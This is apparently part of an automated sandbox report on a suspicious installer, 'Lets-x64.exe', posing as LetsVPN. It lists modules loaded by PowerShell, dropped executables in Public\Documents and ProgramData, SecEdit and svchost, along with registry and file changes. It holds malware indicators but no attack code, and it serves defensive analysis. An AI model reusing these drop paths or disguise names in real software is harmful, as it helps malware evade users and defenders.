                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dll
                              Source: C:\Windows\System32\cmd.exeSection loaded: apphelp.dll
                              Source: C:\Users\Public\Documents\dtw_H3NyEy\_P18sPbB.exeSection loaded: apphelp.dll
                              Source: C:\Users\Public\Documents\dtw_H3NyEy\_P18sPbB.exeSection loaded: ntmarta.dll
                              Source: C:\Users\Public\Documents\dtw_H3NyEy\_P18sPbB.exeSection loaded: iphlpapi.dll
                              Source: C:\Users\Public\Documents\dtw_H3NyEy\_P18sPbB.exeSection loaded: dhcpcsvc.dll
                              Source: C:\Users\Public\Documents\dtw_H3NyEy\_P18sPbB.exeSection loaded: windows.storage.dll
                              Source: C:\Users\Public\Documents\dtw_H3NyEy\_P18sPbB.exeSection loaded: wldp.dll
                              Source: C:\Users\Public\Documents\dtw_H3NyEy\_P18sPbB.exeSection loaded: profapi.dll
                              Source: C:\Users\Public\Documents\dtw_H3NyEy\_P18sPbB.exeSection loaded: urlmon.dll
                              Source: C:\Users\Public\Documents\dtw_H3NyEy\_P18sPbB.exeSection loaded: iertutil.dll
                              Source: C:\Users\Public\Documents\dtw_H3NyEy\_P18sPbB.exeSection loaded: srvcli.dll
                              Source: C:\Users\Public\Documents\dtw_H3NyEy\_P18sPbB.exeSection loaded: netutils.dll
                              Source: C:\Users\Public\Documents\dtw_H3NyEy\_P18sPbB.exeSection loaded: wininet.dll
                              Source: C:\Users\Public\Documents\dtw_H3NyEy\_P18sPbB.exeSection loaded: uxtheme.dll
                              Source: C:\Users\Public\Documents\dtw_H3NyEy\_P18sPbB.exeSection loaded: kernel.appcore.dll
                              Source: C:\Users\Public\Documents\dtw_H3NyEy\_P18sPbB.exeSection loaded: taskschd.dll
                              Source: C:\Users\Public\Documents\dtw_H3NyEy\_P18sPbB.exeSection loaded: sspicli.dll
                              Source: C:\Users\Public\Documents\dtw_H3NyEy\_P18sPbB.exeSection loaded: xmllite.dll
                              Source: C:\Users\Public\Documents\dtw_H3NyEy\_P18sPbB.exeSection loaded: mswsock.dll
                              Source: C:\Users\Public\Documents\dtw_H3NyEy\_P18sPbB.exeSection loaded: napinsp.dll
                              Source: C:\Users\Public\Documents\dtw_H3NyEy\_P18sPbB.exeSection loaded: pnrpnsp.dll
                              Source: C:\Users\Public\Documents\dtw_H3NyEy\_P18sPbB.exeSection loaded: wshbth.dll
                              Source: C:\Users\Public\Documents\dtw_H3NyEy\_P18sPbB.exeSection loaded: nlaapi.dll
                              Source: C:\Users\Public\Documents\dtw_H3NyEy\_P18sPbB.exeSection loaded: dnsapi.dll
                              Source: C:\Users\Public\Documents\dtw_H3NyEy\_P18sPbB.exeSection loaded: winrnr.dll
                              Source: C:\Users\Public\Documents\dtw_H3NyEy\_P18sPbB.exeSection loaded: fwpuclnt.dll
                              Source: C:\Users\Public\Documents\dtw_H3NyEy\_P18sPbB.exeSection loaded: rasadhlp.dll
                              Source: C:\Users\Public\Documents\dtw_H3NyEy\_P18sPbB.exeSection loaded: devenum.dll
                              Source: C:\Users\Public\Documents\dtw_H3NyEy\_P18sPbB.exeSection loaded: winmm.dll
                              Source: C:\Users\Public\Documents\dtw_H3NyEy\_P18sPbB.exeSection loaded: devobj.dll
                              Source: C:\Users\Public\Documents\dtw_H3NyEy\_P18sPbB.exeSection loaded: msasn1.dll
                              Source: C:\Users\Public\Documents\dtw_H3NyEy\_P18sPbB.exeSection loaded: msdmo.dll
                              Source: C:\Users\Public\Documents\dtw_H3NyEy\_P18sPbB.exeSection loaded: avicap32.dll
                              Source: C:\Users\Public\Documents\dtw_H3NyEy\_P18sPbB.exeSection loaded: msvfw32.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\ProgramData\Program\iusb3mon.exe	Section loaded: apphelp.dll
Source: C:\ProgramData\Program\iusb3mon.exe	Section loaded: ntmarta.dll
Source: C:\ProgramData\Program\iusb3mon.exe	Section loaded: iphlpapi.dll
Source: C:\ProgramData\Program\iusb3mon.exe	Section loaded: dhcpcsvc.dll
Source: C:\ProgramData\Program\iusb3mon.exe	Section loaded: windows.storage.dll
Source: C:\ProgramData\Program\iusb3mon.exe	Section loaded: wldp.dll
Source: C:\ProgramData\Program\iusb3mon.exe	Section loaded: profapi.dll
Source: C:\ProgramData\Program\iusb3mon.exe	Section loaded: kernel.appcore.dll
Source: C:\ProgramData\Program\iusb3mon.exe	Section loaded: uxtheme.dll
Source: C:\ProgramData\Program\iusb3mon.exe	Section loaded: propsys.dll
Source: C:\ProgramData\Program\iusb3mon.exe	Section loaded: twext.dll
Source: C:\ProgramData\Program\iusb3mon.exe	Section loaded: windows.staterepositoryps.dll
Source: C:\ProgramData\Program\iusb3mon.exe	Section loaded: appresolver.dll
Source: C:\ProgramData\Program\iusb3mon.exe	Section loaded: bcp47langs.dll
Source: C:\ProgramData\Program\iusb3mon.exe	Section loaded: slc.dll
Source: C:\ProgramData\Program\iusb3mon.exe	Section loaded: userenv.dll
Source: C:\ProgramData\Program\iusb3mon.exe	Section loaded: sppc.dll
Source: C:\ProgramData\Program\iusb3mon.exe	Section loaded: policymanager.dll
Source: C:\ProgramData\Program\iusb3mon.exe	Section loaded: msvcp110_win.dll
Source: C:\ProgramData\Program\iusb3mon.exe	Section loaded: ntshrui.dll
Source: C:\ProgramData\Program\iusb3mon.exe	Section loaded: sspicli.dll
Source: C:\ProgramData\Program\iusb3mon.exe	Section loaded: windows.fileexplorer.common.dll
Source: C:\ProgramData\Program\iusb3mon.exe	Section loaded: iertutil.dll
Source: C:\ProgramData\Program\iusb3mon.exe	Section loaded: srvcli.dll
Source: C:\ProgramData\Program\iusb3mon.exe	Section loaded: cscapi.dll
Source: C:\ProgramData\Program\iusb3mon.exe	Section loaded: twinapi.appcore.dll
Source: C:\ProgramData\Program\iusb3mon.exe	Section loaded: textshaping.dll
Source: C:\ProgramData\Program\iusb3mon.exe	Section loaded: starttiledata.dll
Source: C:\ProgramData\Program\iusb3mon.exe	Section loaded: acppage.dll
Source: C:\ProgramData\Program\iusb3mon.exe	Section loaded: sfc.dll
Source: C:\ProgramData\Program\iusb3mon.exe	Section loaded: msi.dll
Source: C:\ProgramData\Program\iusb3mon.exe	Section loaded: aepic.dll
Source: C:\ProgramData\Program\iusb3mon.exe	Section loaded: cryptsp.dll
Source: C:\ProgramData\Program\iusb3mon.exe	Section loaded: sfc_os.dll
Source: C:\ProgramData\Program\iusb3mon.exe	Section loaded: edputil.dll
Source: C:\ProgramData\Program\iusb3mon.exe	Section loaded: urlmon.dll
Source: C:\ProgramData\Program\iusb3mon.exe	Section loaded: netutils.dll
Source: C:\ProgramData\Program\iusb3mon.exe	Section loaded: wintypes.dll
Source: C:\ProgramData\Program\iusb3mon.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\ProgramData\Program\iusb3mon.exe	Section loaded: onecoreuapcommonproxystub.dll
Source: C:\ProgramData\Program\iusb3mon.exe	Section loaded: mpr.dll
Source: C:\ProgramData\Program\iusb3mon.exe	Section loaded: ndfapi.dll
Source: C:\ProgramData\Program\iusb3mon.exe	Section loaded: wdi.dll
Source: C:\ProgramData\Program\iusb3mon.exe	Section loaded: duser.dll
Source: C:\ProgramData\Program\iusb3mon.exe	Section loaded: xmllite.dll
Source: C:\ProgramData\Program\iusb3mon.exe	Section loaded: atlthunk.dll
Source: C:\ProgramData\Program\iusb3mon.exe	Section loaded: textinputframework.dll
Source: C:\ProgramData\Program\iusb3mon.exe	Section loaded: coreuicomponents.dll
Source: C:\ProgramData\Program\iusb3mon.exe	Section loaded: coremessaging.dll
Source: C:\ProgramData\Program\iusb3mon.exe	Section loaded: coremessaging.dll
Source: C:\ProgramData\Program\iusb3mon.exe	Section loaded: wininet.dll
Source: C:\ProgramData\Program\iusb3mon.exe	Section loaded: taskschd.dll
Source: C:\ProgramData\Program\iusb3mon.exe	Section loaded: xmllite.dll
Source: C:\Windows\SysWOW64\SecEdit.exe	Section loaded: scecli.dll
Source: C:\Windows\SysWOW64\SecEdit.exe	Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\SecEdit.exe	Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\SecEdit.exe	Section loaded: scecli.dll
Source: C:\Windows\SysWOW64\SecEdit.exe	Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\SecEdit.exe	Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\SecEdit.exe	Section loaded: scecli.dll
Source: C:\Windows\SysWOW64\SecEdit.exe	Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\SecEdit.exe	Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\SecEdit.exe	Section loaded: scecli.dll
Source: C:\Windows\SysWOW64\SecEdit.exe	Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\SecEdit.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: qmgr.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: bitsperf.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: powrprof.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: xmllite.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: firewallapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: esent.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: umpdc.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: dnsapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: fwbase.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ntmarta.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: flightsettings.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: netprofm.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: npmproxy.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: bitsigd.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: upnp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: winhttp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ssdpapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: appxdeploymentclient.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: wsmauto.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: wsmsvc.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: dsrole.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: pcwum.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: mi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: winhttp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: wkscli.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msv1_0.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ntlmshared.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: cryptdll.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: webio.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: mswsock.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: winnsi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: rasadhlp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: rmclient.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: usermgrcli.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: execmodelclient.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: propsys.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: coremessaging.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: twinapi.appcore.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: execmodelproxy.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: resourcepolicyclient.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: vssapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: vsstrace.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: samcli.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: samlib.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: es.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: bitsproxy.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: dhcpcsvc.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: schannel.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: mskeyprotect.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ntasn1.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ncrypt.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ncryptsslp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: dpapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: mpr.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\Desktop\Lets-x64.exe	Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32
Source: C:\Windows\SysWOW64\cmd.exe	File written: C:\inst.ini
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOwner
Source: Window Recorder	Window detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Directory created: C:\Program Files\product1\
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Directory created: C:\Program Files\product1\letsvpn-latest.exe
Source: Lets-x64.exe	Static PE information: Image base 0x140000000 > 0x60000000
Source: Lets-x64.exe	Static file information: File size 21353869 > 1048576
Source: Lets-x64.exe	Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
